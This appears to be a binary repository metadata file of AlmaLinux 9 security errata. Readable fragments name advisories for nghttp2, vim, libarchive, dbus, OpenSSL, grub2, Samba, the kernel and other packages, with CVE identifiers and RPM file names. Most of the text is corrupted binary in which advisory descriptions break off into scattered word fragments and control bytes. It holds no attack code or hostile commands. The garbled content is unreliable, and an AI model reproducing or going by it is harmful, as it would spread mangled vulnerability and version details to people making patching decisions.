��GBsecurityImportant: nghttp2 security update� '��H�.https://access.redhat.com/errata/RHSA-2026:7668RHSA-2026:7668RHSA-2026:7668https://access.redhat.com/security/cve/CVE-2026-27135CVE-2026-27135CVE-2026-27135https://bugzilla.redhat.com/24487542448754https://errata.almalinux.org/9/ALSA-2026-7668.htmlALSA-2026:7668ALSA-2026:7668�Z�blibnghttp2-1.43.0-6.el9_7.1.x86_64.rpm�Z�blibnghttp2-1.43.0-6.el9_7.1.i686.rpm�Z�blibnghttp2-1.43.0-6.el9_7.1.x86_64.rpm�Z�blibnghttp2-1.43.0-6.el9_7.1.i686.rpm���j�
���KBsecurityImportant: vim security update� '��v�Ghttps://access.redhat.com/errata/RHSA-2026:8259RHSA-2026:8259RHSA-2026:8259https://access.redhat.com/security/cve/CVE-2026-28417CVE-2026-28417CVE-2026-28417https://access.redhat.com/security/cve/CVE-2026-28421CVE-2026-28421CVE-2026-28421https://access.redhat.com/security/cve/CVE-2026-33412CVE-2026-33412CVE-2026-33412https://bugzilla.redhat.com/24434552443455https://bugzilla.redhat.com/24434742443474https://bugzilla.redhat.com/24509072450907https://errata.almalinux.org/9/ALSA-2026-8259.htmlALSA-2026:8259ALSA-2026:8259�S�
vim-minimal-8.2.2637-23.el9_7.2.x86_64.rpm�7�
vim-filesystem-8.2.2637-23.el9_7.2.noarch.rpm�S�
vim-minimal-8.2.2637-23.el9_7.2.x86_64.rpm�7�
vim-filesystem-8.2.2637-23.el9_7.2.noarch.rpm���w�
���NBsecurityImportant: libarchive security update� '��=�thttps://access.redhat.com/errata/RHSA-2026:8510RHSA-2026:8510RHSA-2026:8510https://access.redhat.com/security/cve/CVE-2026-4424CVE-2026-4424CVE-2026-4424https://access.redhat.com/security/cve/CVE-2026-5121CVE-2026-5121CVE-2026-5121https://bugzilla.redhat.com/24490062449006https://bugzilla.redhat.com/24529452452945https://errata.almalinux.org/9/ALSA-2026-8510.htmlALSA-2026:8510ALSA-2026:8510�.�libarchive-3.5.3-9.el9_7.i686.rpm�.�libarchive-3.5.3-9.el9_7.x86_64.rpm�.�libarchive-3.5.3-9.el9_7.i686.rpm�.�libarchive-3.5.3-9.el9_7.x86_64.rpm�ψ��VmXZ Utils is an integrated collection of user-space file�mpress�u�@ities bas�9�the Lempel-Ziv-Markov chain algorithm (LZMA), which performs lossl�[ data�i. T�W�?provide�� highÔ��io�Y��keeping��de�%time short.
Secu�Wy Fix(es):
* gzip: arbitrary-��-w�%e vulnerab��y (CVE-2022-1271)
For mor�ota�_about��s�gissue(s�includ��im�gt,��CVSS sc�G�
cknowledgments,���j�/r rel��in�@��n,�f�to�R�� pag�m lis�,�R�&enc�Es��.�egrub2 p�u�6s�j ver�82��?Gr��Unifi�TBoot Load�z(GRUB)�ƪ�ly��nfigu�3le��customiz�b�:l�:w�ީ>dular�}ch�pcture���supp���bvarie�S��kernel �
�'��sy��m�
��ute�V�Mhardwa��vi�.
�mshim�r��t�IJrfirst-st�UEFI�that�Ondl������o�7tru��full�3un���environ������: I���Bflow�ޢ_net_recv_ip4_��ets�28733)�HCraf��PNG �yscal���nmay lead�DZ�-of-��nds ��sheap�^1-3695�]�S�R�Qd��7huffma���)�V��g6�gJPE�hc�>�hb�N�,������7�ZOȤwhen��sp� HTTP�Id�/�n4�M�[_lock�X�Br����s non-��i�D��e�*d�Q�b�-��r-fre�ӳcmd_���k()�B�=��: B�ov��ޢ6��c�Y���H7�Vi�Vi IM��ed)�upd�g�yim��
�vi editor��v�]Use�.�F�<��Po�wr Offset��v���W055�4�@H��-�h��O��oc�ts�?943�?�y��420�2��4��+621�+�&-r�o�'9�'us�f�{��utf_ptr2char�51���SExpat�G C�.b�J��B�?��XML docu��e�C�0ta�,exha�D�z�v�9type�M�531���=��	���=copySt�f��:�w��C�2��3Linux�!,�����any�ope�J
���B���C: Sma����8�[b siz�[TCP sourc��gen�^o���
�k�012)�{r���di��Q_ev�f_�ƤT�Hpriv�T�e���^�Y7���Ya�U�/�a���sub�$���l�r���t966�t�o�mIP�� ESP t�s�co�
�76�K�
Bug�`make SHA512_�
�.s�CRYPTO_USER�4��-�
(BZ#20726�SR-IOV�c
an�*> 50%���	d��3483�fix�
rrup�iau�yby dm-�-��98218�+	SC�cli�$-s�6peeloff�ns [al�(�_-9]�<404���#��n�|f��in��asymme�c�<u��itu¼8548��F�6�4	�fMultipl�jT VMs ea�B�e�vCPUs�E�N
�6spec:�����^a��tools�hd�-9�u��c����s���eeh_pser�!ob��:��vm�oi��	t�=p�d,�q	kdump���ggere�n225��	�U�
��
X NIC d�jer�'��
mai���7638)���ve��
�mm�L���c�t�
��sev�l dif��t
st��7�K�r
�KGNU�r�w
pio�/ISO ��0 CD-ROM�F
.
L��is �f��Jy�'bsdtar�oy,��rip�l��u��bin�ws
su�$�yth�J�񤄦�pop�d�Ektop�,�ag��	���J:�
�
�+via�Mmpon�+ �Fx_lzma_al�_�t
�62���7�
�<�
�o8O�gW��8��*��v�k
regs�
b�()�r�xp.c�K8��
��
i�
�Embyte�D92�

�W>	���ascsi_i��
l�
049�%��tc��w_����/sched/cls_api�0�H�&Power9 - LPAR�:��Sha�G��c���m�9	����se�[Hash]�w48�zH�& �up�+���nrun��� ss-� �`��ha����dFIPS���Pd�1�c��Inam���4�>338�Jfs2��=�����g�
s�Ume����ght�K730�|
i/o��iator��u�o
�:�Kwork�;dis�g�Z4.18.0-372.9.1.el8.x86_64)�[825�A����(�
esn't��3�SSATA�5974��G�/	t���re���@post��
 mig�L����� �����^10��{Oop�r�l�t�x	�	�IRIP�8de_attr_�_lab����g��!�s�l18��l�BUG:��%
���&��t�#���xn��l�E
�fs4�ton�
�;��loo���r��lp���s��	��: K��acc��ebad��a,�P
g: 11 [#1]�kc���+tu���Nn��t�L��(P10/ ibmvnic/�����)��30�OS�����^vm��O�U��map��\e�'���)
Enh���^�'�Bommu/vt-d:�
�,DMAR_UNITS_SUPPORTED��� ����U5326�
������~���%
������	��dow�f�_�from �#r��	��ou�atoc�R�Z�=, F��:DAP�8�{:�l���Dial���ti����322��;Un�5��	�mi�Fs�57�5��-KRB�7m�t��v���98�	O�=SSL��	�
ki����m�;
��<���o�gLaye���:)��T������(TLS)�a�ell�a�)-��ng���-pur�e��ypt��phy���-��Z: c�
h��A�sc�C��j��+29��
�CSigne�[�����re��
n�a���hp�V���OCSP_NOCHECKS�o3��oOPEN�H_LH_flus�
br�h��L�����D47�D�����18�GAES��B�a�0����me �s�>�P�g	��qa�*�Cy�,�n��n�}��o�mgnutls��FFDHE��8032���q�"��Z3DES�+549����pts�I �1�c���ara�/�t�|�N�	��5508�]m�U���>ECDSA�
�5
licit�k�F��	e�Z�#��s_� -g��p�ip256k1�>�[be�r X��19/X448�S6�Conv���X�8p�-on�Sl�_�?	�FKAT�88�j�R��keys������on��9193�+�q�&������Y��O�Z�h���K7�[�w��su��]s�qi�5��[IBM�R
HW�$T] POWER10��e�0s���5�\�y��[���o	��view]�R-�R�*�78�*DH t�	g�*5856�*EC�*7�*�S�+8�+AND�,9�,zero� ��,61�,HKDF�5mit�"�1838�b�P�acy���1
(GnuPG�lGPG��K���&���r�
��ig�hl�
na� ��lian���PGP�7S/MIME�*nd�x���
��gpg���S ��of�n�t
st�s l�?�34�@��dbus-brok�@�$�������	bu���Tby�WD-Bus�'�. It�*�i�m�D�
��١�i�D$�%l�$��P�a$��or��ű�z�uexcl�jve��te�~��#���Y�n�A���r�/e�k�����J"ent���e��g�f�K���W�ka�S�Ex���~s�$l�_$�12��]n�S#p���$��Dy�X�g���Q�z�
��a���C�����. �nft_s�$e������J1��?�Y'��
�Rd�S_�йy_�e��0��y
�z
�&R��/mlx5�numb�f��c�{XLT ���q�-227�O�8,�x
t�+��ed�Qun�w-�Ye-nex�7p-ob�.�-�G5�n$�)�4��un�l�
d MSR�_�: WR��0x199��amazo�t4.32x�
�t��n941�X86/p�X�S/UV��S�>�	����UV5 �)��773�+�	l�{:���2�sync s�\��soft����blk_mq_�G_��ch_����9.0�z]�13��&��NVMe/��der���o+v������%�vonic��,�nic�^77�Ad����nvme��a�j-�
�7�~	�(/tcp�9t�n�#uses����(_to_rq(�)_�)��l(��ue)��69��Im����hb���Y�&929�x� 9/ppc64�hIn��\�-�
& "C�_�
pe��"�=�a�lscpu�.�d2171��	�
*�/��d��+w ���y�~AMX fla�amx_�~8, �	bf16) �H82�6��: D�mU���!4�!avf�"194��i40e�"9)�7$���#��!�sdoCont��f����xml�N�/406�|�������������.��X
����#s���� ��u
, �R��D�	��N�����O��|�
���fit e��0��o�
���x�In�N�x�����-or�!�K�M����C++, P�K,��Pike,�f�	�
�.k�RSH��NUPG�+�$�*���E0�䪈fo�|���have��+p�"��a �r �*�v �:��(3.7.6),��;�8)���3�{ou���j,�_pkcs7_��y.�Q509��Q�A] [���"@�u-��r�l�P�258�xA�����K����K5��-CBC�mg��{�>�3/��:�(*���2���<2�r��1�0)KSB�p�/�P c�[Kasbah����o�%X.�"�����MS���!	i�0y���Q. �R1th�_s��$��������9�G����k���
*�/r�K��
ex�G�7�51��
��1-�q��
&ath��%�w�,t�; �;������P$�!�`2�1̔�wuth��bypas�!� d�<��n��n���'��R's�;an��s�t�3��l	��19���p��� �����:�_Em������0�60�B�>V��ML���N78�C�z�m��a�[��8�	�+��$)�Z�^)������3��1��l����
���*	�J�8�4 �	r�6eld��43���U���)�P�8:r�Q
�?��N#�
h/25�"� �(d�T�D�K�gPTRACE_SEIZE�W�3�O��!S�D�CCOMP���059���
����#�%�%��T14/G2��D�p��+(mt7921e��%56�&��v������~�-lle�{#�U0�Matrox�x	a�Mscr��vVGA�z*put�
�D�i�120���nee�1o��a wa�L
�"e�a#C�
DRBG�fa�5;��y�����;���i��x�|w�dog�%����'��.#30��&�734s! [sw�/30:0]�O7���
��5.16�"�Bad���Q�p�}( qemu-kvm  pfn:68a74600�?�,6f��=��E�%s���2M �6s�>879���Vh�-t 2)�9�n��N�lo��% hpilo�����* HPE RL3�
Gen�&��ARM��y.�[(��4�������pret�I0�a�G�.����/�����es�3s,�F
�k
��[e�g��y��l���0ynam��.�6��d���l. �����3!�K'���B�H4ll�C�pi�=�O
o�I&wind�K�u���}��-�:7��PyLong_F���7�6�����d��gv�y �`���9��o�a��#0-��=�plua�>	����Lua���!��V�m+-we�t+�x ���>�Len���
L�w��lso��nt�d�p�	,�-�u1�k�ua��:in�G_��ms��de��.c�;��
un�xro�3r�a�*
�)�$�>�30��#��	�-�B�a,acker�)	� �vor �Mmin�o�G�	's�y9��3651���	�����]_�*�}nd�	�N�+@�-smb2�0_��ry_�i NULL��	�01�h'�*i�d��9��nd_�_�kicbdu�����.b��[6�{swiotlb��t1�H"�\_F�5_DEVICE�?��-�-�?3�rs����i�do�q@�N6��%�$���'-g�:UM�i10����:s��pcm_hw_���i��M�0� ��0)����%�w4�����6��o�8��/�[B�k1�0�ur��y�wb�F0�0
drm�ma�=�,�+���K/��,<s�b�*6��Y�33���pf��_���:3��
��P9k_h�B3�be_��Ocould��an�����ß67�	�	��!1emu�_�	n�9
�2�5�[9fa���u�fd�:t�������G�9�nf_�D�o�2�=o��>.�@�!�
�T2�g�oD�F�
��6�._sfa_�>>�� 63�`s�&-�@�p���E��!3�din�D&e���n-up���M-��/4�
�ka SBDR�N�\3�Ni�]�lGa��Dl�TS�T5�T���a�$��C�)�_DRPW�_�*po�~�0�����to�N�����c!�cho�\021�+�~:�+tBl��A�@J Sp���)�pC�[��$�[�i3�5.�s�&H��^3816, �9900�nBran�T��
C��$u���Z �b��)�L�c�<H�v#Po�!��:r�F��S���P�iȓ63�d.d�L�Jms_usb_st�
_x�?i���s/�7�/�!/�)�j283�6 �x��
�XSUNRPC�l@�589���	i�~:�u����c��i�38u32Ę958�Y�5�?��ӣ`���fqnl_m�
le���rA/nf��S
k�hu��H4��!���"��'=�al�ey �C�M�D�,0�Ds_��LB�R��0��	��f ENOTDIR��44���~#�
�|C�H%s:�Ҥ��j�7c�%�Ti�!@�6), se�w�R� No�>��ed�j�	�r��$�5�_��u�R���&8��*hr�n$z��Os��ly�>a� a��8. S�.�γǤoi�st�/�o�U$�1�R���in�q�]
��Y9�5�:��
hol���M���u�mi��	��ol�v�	t�9�n�
��p�c�8�~�}:�<8�H
IPv6�3��D��5�17�'�<7Samb�Ln�4-�I���	�AS�4M�0B�H*(SMB��[�8C�(�A�(rn��>S�IF�7�v�PC-�/l�w�;ne����,�~�Z�����C.�6d%s�,��>6.4)���V+4��G���2:�@�w?�s�?�E1�$2742�@$l�Md����-"�m���#!�%��-��'API�/�n�*$��/�'����TDB�
�k��4���(2.5.2��
�
�AD�	��
u��� +�����
 add�����.���0!�}�F������#��,�-qua�F5�.�on�DWg�F4�����-�%�$�a
�[�
s�W�[re���di�7u�glyph��0ff�4����W�]U�"sf�O�B
_�NB�4�L.�>Se��iviol�	a FNT_S��_R��H5�Ht�HT�B�O�G�=����4%��3.9�.�],��I24�|�
%�)'�O�/4���@!���X2a�z�se� ��1�A15��GD�^��X�
3���z�;/http/�.��G����c�&��(��1��"�>O	e2fs���G2a�7�afo�5/��=, �(7�	�=�
�@�]�g�z�	2,�3���:�� ���O��/������[��Q13��:;�>MfBuzz���o�+��n,�i����h�Rb�R��Y�O�Rh�4�Uhape-f��%.c�7�M�A�D�HH�5��c�~P�C(DHCP�Y2�X�
��~
�D0�n �M�Gto ge��i�	w�Nc�t�j��Ka�.���i��k��a br�c��'�dh�V:�
���{g��@ISC �� �K�9
��Dt�'�hdm�s���.��������5NS�ow�B�-�ch��iso�D��e1�220�A}ogro�*�us���b�"��r��Ylo�by��ii�u�a��H�^�9�/�Fmo�d=�n��	i��
�&��:� ���u�-��W��*��;�B��tirpc�h�k&Sun�DZ's�S�3-i��p������d�5���3I-�a�)�Z=�F�\
�7����
��e�6-���
���������:�}��lot��7��5��4682�Az�,8R�_��(�)���7 �)B�'��	7���<�%/��&���`�AZf�	�"��# �Pho�42�C"�P�oF��os��Pauth�&c�#�e�0�[��^�乍y�l�Eby e�a0nat��n�-����"�!�;�8d�B!�e�LN�����L�=�<�=��to����c�G�m�ahel��'�n�cr��r�s�"�#��Pd��	ib�$�4Le�*KDC��Akrb5����+
i�-
AC�v��h4�t38�f�esud��4�H/��?�1s��Do����@�F�
���2��X���&�t��
�iGs�r�N$�Z�u����<�.i�ut��]�4+g��as�g����rs�T�ho���t,�+RunA�;��,3-2�&-�X1c��"POST�PUT�|�*�j2221��U�2�E:��9 ��)�&1�{k�~��*�,�U�!��Fa�"
X88179_�beA��wUSB e�K��
.�V64�Vi91����KGP�bILB ��Zï�]9���_ ��13ï�\
�'�0�M�,�S�"�3�=g�X��	�X3�I9ò2�{
un�1��l�A���U��?smt_���n/30��K�Y��=�f-�H��v�hN�\M�iN�2<�|3�%2<5�8H�N-�O�Z���g�lt�7t�"ly�t5EMC��8st�~NDU�0�d3�3��i�@N�/�@=9�)��"�w-WARNIN�=�=�b6 PI��/3440�P�Y1/x�Qmm/��:.c:��a��_ha�Ycr_f���+0x3f/0x50�f458�2�v4:���l9��	of�4����X_��>�Y4_�3i�kg�)�&or�$��i61���|/�p���z�'+th�{R�dysf�g�`.�*�"-EINVAL�J9�S69��DE�l4�:�_'i��@�?�1�m�5R�Herc12.�J9��U*��4Jl�+P���?mon�j�!6�}4�^�E��R�-���Ybio�/e�e401�5P��a�q-�\<"Dummy��i��P��ar�/t�%4����
�M2�.8�SQ��8��e��o�z�7R����e's�]�c�alef��0z��?�*]�Z397�;0fa��K��S�{in �4e�g�s2t�-t �gof�n��g���%��5AMdCLIENT:�?�z`l�#�H^ "no�:�"�̪�mp��1�8�\52��8Az�0
:�=)I��-v�:��ECI_�5MA�@MEMORY�me�%VM�e�~�S5�]0�S z�}bam:�H��imes�?��eploy�n�Up��qg�\e�
l�ed�
�+��	�	��s16�#���TT��- O���
@760�^���B�s�id��g����E�i�l�>7)DV!-Bus is a system for sending messages between applications. It�9used both�:the�I-wide�B b�fservice, and a�sper-us�login-s�,�Z�4��facility.

Secur�
 Fix(es):

* d�W:�-daem�;crash��wh��receiv�� wi��incor�tly ne��d parent�8es���k�brackets (CVE-2022-42010)�zan�)���y�@�varray leng��nsi�|nt�elem�type�p1�p`_�_marshal_byteswap` doesn't proc�v fds�dł"��eign" ��ann�)��u2)

F��m�3 detail�bout�殐issue(s),��lu�:� impact,��CVSS sc�G�
cknowledg��s�
o�/r��la��in��m�f,�fe�Wo�R����g�m l�<�,�R�&ences���:.T����ck��v��n��������� man�-r��Linux,�8��tibl�E�uSysV�7LSB��it��ript���v��4ggr��ve�halle��m�0pab��ie�u�{so�p�RD��a��v�
��tart�`���7of��s on-dem�æ#of ���ekeeps t�Ԣ�)e�â.�� cgroup����ddi����upport��napshot�c�Wr�Cor�q���t��m�n�rs�Iun��auto�
poi��1��� �
bor�B��ns�	onal��p����y-ba�}����rol �Mc����also work�sdrop-i�plac�r�Yysv���j�/:���p overrun���_ti�lpan() fun���Q3821�PEx��.C�.�ry�<p���XML�cu���Ie�E:��-aft�dree���Iy�Ye�}d�Xru�I�Z��h��TD���m_Ex�A�Ent�gP��erC�>t�C3680���sxml2�{��develop�<oolbox�z���W�H�Jvario�^����ndard���u: ��e����flow�U��PARSE_HUGE�w0303)�Adict�pup���e��� �� cycles�M4��SQLite�Cth�W��(�ta�� �3ine. A large�bs�&�ȡ&92�N�ed�%�lete�A�!tor���H�le��sk fil�Z�^API�(�v�#�*���Tveni���e�M�x���i�
��link����t�����enjo��e��w�<�Jflexi�y����[��adm�strat�Ehass��5����f�_��er��ql��:�z�	-b�ds�� if ��l��of �n	 a�{���Jtr�|rg���ڪK�5737�b��
�L	�� B�(Bourn���� �ll��which�U�Udefault��^Alma�x���p:��heap-�{-�n��lid_��me�
_�+���}715�|A�,�[
Ab��USy��x No��On�ASN.1,�specifi�l�dX.� ITU-T �ommend�:)�����ures����D���&ui��E���/Ru�DER�yp��l90) e�"�=de��-	�	�tasn1: Out-of���}���4ETYPE_OK��1-46848��KSBA (��n��c�+Kasbah)�?�o��k��509 ce�
f����ja�CMS�i��
�<���s	����B���6���buil�"bl��S/MIME�TLS��k���G���e�
�7�ia�7629�;grub2�<ve�l��2�>
Gr��Un��Boot Load�z(GRUB)��high���figura�Ǣ5cus�Y
iz�b�:l�:�	modu�A��ch�������O�b�#
e�ke����
�'�2�
s�u���V�Mh�X
wa�����: B�\
���_f��
_�1�_glyph�g
�Ylead��o�wr�x��po��#�bypas�[
260�d��H�l�yed�Vs�W�\�V�_�p��uni��sequ���7�O�vSSL�{�hki���
�<����s Lay���:)�!��c��(�;)�tocol���a�%ll-���?gene�I-pur��e�uyptography��ko���?
: r�:b�r�H����&���Q���tt�d�JRSA De���:�
����Idou����&c�8�\PEM_��_bio_ex�D450�D�c-�Gfol��CBIO_new_NDEF�@3-�85�@in�_	�e��
��d2i_PKCS7���M6�MNULL�B�\a�D�(p��ic�my�E7�EX.400��S�.�u�D��G� N�
�L8Ւdu�Ԥ��F���J4�2��

Bug�HMAC�[��s�
l��je�b
���s < 112�
t�r��a��d�,��xFIPS�ue�Z#214����I�,���n��a ��
mum�1�-�����PBKDF2�X��stun��,um���) a�l��me��y��p���TCP�5n�����a�����h�f	�p8�ɭ8SHAKE��diges�p�-OAEP�>�g10�g�SS�VP�La�g
���5�a���p��siz���h��
���,ٙ2�� �Ua�I�79.31��d��m5�o-224,�38�512��P�56����es���
�YDRBGs��
5-16��7ު�áQ���欘�h�v9���e�^2048�_��EVP��EY_�
��u�w��517����9.1 N��\[0912] - �6or:���93:�it��en��e routi�::��n�	����gi�Flon����P�
��bmca�7��	��l�oca.so.4 (��3.���9�m��Hche��um�need�3pd��6584�
���*�O�o�c�a�!,����y�op�{ng�_���E���Pl2���(��m�J_sdu�2��net/blueto�U/�'��.c�
56��gs���%	do_p�B_d�vec���skip_spa�4378�Q�Q__nfs42_ssc_����fs/n�4�c���Co��mo��D��D���	�~9�~Net�N���vul���1ft�by�J
�)py_vla�1�[��7�Qi2c-�t�iv���287���W� 9.0: LTP T����+��8 a�k14 �S�hir�dapi�FPl���8280+�|3308��d1 ��� NMI watchdog's���
��	LPM����5�FMDSERVER�F:�:dp������1�*�&������K�
oa�$127�Rqla2xx�VMe-FC:  WARNING: CPU: 0 PID: 124072��xs/scsi/�=�_�c:70�S_�ɹ�ne_�tn��+0x25/0x30 [�#]���X��Re�on: K�n���L��vo T4�+�cAH40 USB-C��k����V327�Sc��
r U�+a��l�2)�.79�E�4, Nx_Gzip: n��ot�� c������decr�I
��y�š�un�(�ur���7b��lpa�
�D�. (FW10�/ DL�����
�MSFT, MANA��ET P�G��-9:�� race�.��"CQ�:�n��_ip�W�Rfix�b5�0��z�vPCI�W������
�Vi-MSI�B459�BÕVM�ploy�# F�gs��R��~�F93���'��' �{�5w�o�Zim��3#K�bs390x g�L881���.�R���H�3sync�Wup��am v6.0�K6134�1CEE�phf�#�'��i���?���ORIP�I��:n��s_��q_un��ef�8��]�p41����6�:��Ц2535�py�3��$tup�"s��a co�"�g��en�� s�P�B��Xbu�t�&" a��t����7�^�N��Np���:��*����d(ReDoS��`_i�!x.p�L$089��G��
�7�t�%
�ac��!b�^-or��e�	g���3gu�p���e�#�'�Il�	�ex���,�y��l�� dynam�J����d���l.���#��f�	t�0�q
�#�X�C�8�$�9o�/ w�޴��O�}����7�#via �f�V��IDNA��o���8506�4#�C�&�����
k��
e�V�&-��dump�1	re���/fs.su�6������4���xd�{
���f��a����a l�9����%5���%ua����	��ua���"���V�-we�� �V�>e���Lua��Yfr�t���d�#,��%-a�7�k��ua�����|s�
nd�d&Es�;��1�,9�4�<�1�_��um��ldo.c�Sa �H�?f�w���l�d35���7Vi�"Vi IM�0ed��n�j
d��� ��vi �	
o��$vim:�����$�5ret�#�qu�}XCh�eGC(�{��702�k'��GNU tar�f�save�K
p�ai�"in�~�v��O�fro��!�z�j:�$�V���C_he����¹���g!�y���t�8�O)�	!nut�
�5�3���"Gnu�%���J��	i�^gor�ms��p�\�ch�&��,����D��"����s��-ch�D1l���(�Y���a�4�+3��
��CCM��g��kb�,mi�L�f���s�9�3����j�5�)*�	ac��cmdl�[�q]: E����� �	i��z�Y���le ��s�1elf�� i��r�;0�cC�2��vo���v �qun_�_�&�#�!�ALSA: pc�rMo�:rwsem �!
s�
	n�4tl_��4� ��<v��
UA� 6����u�Bsoft�Tup��TC�r���-to-��� a��26�/�P9�- zfc�+�\mi��� �Bs�n�Mus�t�6t�!��278�&1���}
_v2�_e�U7e�O�3"�
/��er��s��#��pu�1
f�y�s
sk�Sa�Ius�r��
o�쵠�37����%�dd����%�Qi�^�x���_-rt�bug:�]�&circ���R����
��u��(&n->��_�%->&p->����wai��860�C��S���.s�_�@bal����!��3��� di�_� �}+�1��!�/k�@)��� �]��'�*#��k�
�K�+�1gpio���D8se��t���
I��h�R/�*�	�E5���9 ��orvs���'swiotlb ���$	�in��fiden�L��`7���>E�((�IBM �] FEAT�b��EQETH�g���n��	���e.�'�l��6�%��l�_ SPR�AMX: I��n�f�%�D���O8�5��c�V:�������+���1�y��d�D�F�5�
��0�D�����HTTP, F��eLDAP� �}:�0�{�
������239�&�
�]�FUSE�����A-pr��<l�d���K�s esca���h
8�{��Fi��_id���Eagle��/�3����~�?����>�pped�robu�7��,x�Y�
pth�)m��()�_�`)Samb�n�#-s�3c�P�7���N�!Me�>B�=	(SMB�
+��aC��A�n�2F�l
S�-(CIF�I+�$
�j PC-�Dmach�m#����u,�]�Z���P�������?C4/�M(-MD5�k!Log���1��6
�dak�b�3�
���	�2��UG�[#��#��(���$�_�C�)�$4289��-ul�|
�r�n��ULP�T�,4���"	�TD���y�j�l�Gecu��beyond��con���(	�Anch�Z1��/34�[�p c���.�,F�,PUT_VSCREE�
FO ��tl�z�@% OOB��/�/*�Z3365�	�M
�������!tty�_��s�A146� �F�,�d-kvm_mmu_�-pc�gva�F78� �~�
p�| _���-1�`�/1�>�=�W88��nV���:IBPB��9�O�� � �1S�vr���"��y11�G�%:�m%���"_��C�+�/���D�	�D�xfrm�&be_�
s����/���n0�Io��%��Wib_nh_m�I!���
ipv4/�!s�tic��34��Ȩhu�
l�Yo_�R� mm/��'2�����>�{6_re��/o�<��5��
���s���-3�����_af�;���'�P��
��opt�K�
�K�I�G�{�/�Nű�(cv_acl�L�P��(6�*�
����0�Q_pt��Sgup.c�+�uso�k�e�uy�\2�X�]��~��8v�<re�&�:��:_�f�Q��B%�7�2brcmf��<���fla�_���+��A�x�UD��?spl��2MB_gtt_����I�	gvt_dma�p_���n��f70�pt��	���>�8ra�Gal�'is��$�Y�|+�l2tp��E	��o����:_�i�
ό�d�gigm��i�Y��_mc_�]�y�	�x�o�,��i�	�
2-�qG�����
�6��
IMA�,15��usb_8�~_�~_xm�2������/�&��*�
2��Jn��I��:-nd���ro��>����T/KB��X�4���374�Hn�&m�n��_r� ���gm� ��^VM_PFNMAP �/s���
�(�oB�91�¢flush�5	�:mis�I�	�7K�nV�_P�MPTED�m�{�o���M����t�8���vl��dfg8�<1_��_n��0
�	���416�**�f�
to���
on_vma�re���G270���]ss_����(wirel�/�1��	72�"B�9���
��C���j��_�(�[���^&�beaco��)��n��	P2P-�P:�H����/
�n-�r�47�	�tr��c���!�C�j
�H��*9�Hraw�Rp��_�p�f�@�39����9q�_g�6�D�290�G�!0��7hostn�/7i�t/�=s���q�3-119�{���Tc���e�63�Q
�A�$���@s:�Ҥ��j��c�%�Ti�E
l�BE, se��.R���Aes �Aed�Z�	R�-�"����at��C�*�;�%t�; �;��(�)�&�!��=͔:�A�J$�����J�/�C/shm�sym�`F��119�51�\��I�1�Y��cha�+��i�xok�]-�P�,
5�L�QU�C�a-gge�b���!��x�>n��J� n�35�P�>�fw�R	��J����e&�aT�N�B�
�Q�Nfirm��`�n:�� ad�>)�<��/etc/�&/� f�k
.c���[��5�Z�0�53r�~Tty�����B3�21�-@2�-@�AnD��/Ho�9C��E�~P�(DHCP�H�����"�u�����IP��
��e��i�twn�c�t�j��K�V���������a���cas�~�gFdhcp����y ��-ISC �����*i�q��en��F�N��.�����h�o��@c�@�
����R+ry�i�p�;��Dd���Z�29��b�����(�"�{@��s����E�Ih��*b�[u�!�(a� r�6�J,:� (4.17.5)�#3199���	���&�'_rnd�Yan����g�a2�9ct����Jom�'���"5�<�IU��& C��L Cip���+NID_un�:%�����~��rI�358�@����7/p��2���?(��Esev���f�St ���K�����/,�1io�eISO 9660 CD-ROM���.���i�`no����bsd�0�,���m2��a�3b�J	�v�,.��;�񤄦�pop�U(�3k�C"����7�	�R�L��$_��� '�9��Aberos�I��T+he���������i�(�s�qy��Sy e�/nat�~�
p���
�U�5�J�
�/�Ji�vP���ҩ�r8�
�?s���p����ea�����T:�Wp�{" �*��t�U%�(�"�#��0�w>ce��(KDC)�7�krb5 (1.20.1�0163�b�[���8�� a���FR�����	S4U2P��V0-�x*4�=��/��/9�5����
�_/�C�
H�
�	�
�
�BL� �FHb��f�Z?UNIX������m'��h��e��0����nec�L�����i�!���D���
h:�=�WS�� ��n��$(����_�B()�'���J��3�O13�-c�F�;�
 ��d�p������7�-7�-ar��b��
�a�Hh��\s DNS��om���U�i) �s����s ��Vol��k�a�v�~�H-��a UDP ��M��F�~3206���F��
��%rl�T.�ae�� J�n�D���43�^�KP�-�kB�$l���&c�� �6�{_r��6�[[�$��
x��u��~u�_�gv�GZy�nX�Zpo�
�_��/�\I�#�\�A�i�f�a��sil��
�o�<�a5�aC�Y�8�@B�;F��?�I[I��V�
-�0-AES-XTS�	�64�xV ARM�Y12�_/�$�4��W�W�4�2on�c�{�N�a�>��@�9586����W�
�y�eXor�dX�
RX�i4�i�@�L	��G�@o �J�Z�n�6IV�Ss�l\�N�V�C��d��
����/���I?s�a?-��9��z��@`��`��`��_�lg�C��l�!+fip�(�F_�F�f�s�_$��X�B����
�
�e���Z (��+?�M��@VE)�
��o)9���Y��
�o()���DHX�,�r3�v��^&�r�FEC��__�O0�(��R���__�"�r�gLe_�+���
��pairwi�o�=uc�-4�
������r�Z�L��DH�T���O�galway�Z���^l��lb�=2�A�b��;pkcs5 ��j�}�>�B1��1�B�b>��GEM�B�D�&,�W�V>�=it�ci�ǥP�4�����q/_�'�j�t�>��s�m���as�5�d�P%�x9�>��d �>�7re���[i�&7��[���_�= CIPHERS�bA��H���9�,396�r�[�Z����
_�YA_��c�D��{�WP�VD�H@E�IC�2�e4�FC�[5�.n�����]p�FWb��4�m
�/1�
<6�*
23�.K���2��n�~��zed�� �qV�j��0�$���5�k�'��rFS��-�H1�5�H�[�	"��gi�:6�_sl��_�)_xf�I�N9�N�H�8o_�+g�I5������2�y8�	�%	�qAQ�lA��=- (���D�g=768�RPL-P IOTG/�
S�
:�D��c���85��a�g�����:��to�-R�*�kPT�l���'�!��172�j��BUG�iwlmvm��fi�0�Q��"h��F67�6�bC 9�yqck��.�G��9�m/7a0a36�f2fd6�wa54a��f�hc8�Ae9b [��9��9Fix�Q�l0un��He�}re�kvmc�1Y�	�t1”blk�
nvme/047��a���E����S��l��7O�hif��a�r�+��es��r��&�7�y�3l��
J2 h�
s�`70����[�F]: t�& ��Ri�颲:1778��e�M�\�Q�e��o�$���
<�pE�� �*5���9�7e�U=��E�J�5934���2.��w�8:�los��@&�occ�ձ��:�wcach�h9234�wd�zwdt�^�67��,Munexpectedly (BZ#2192585)
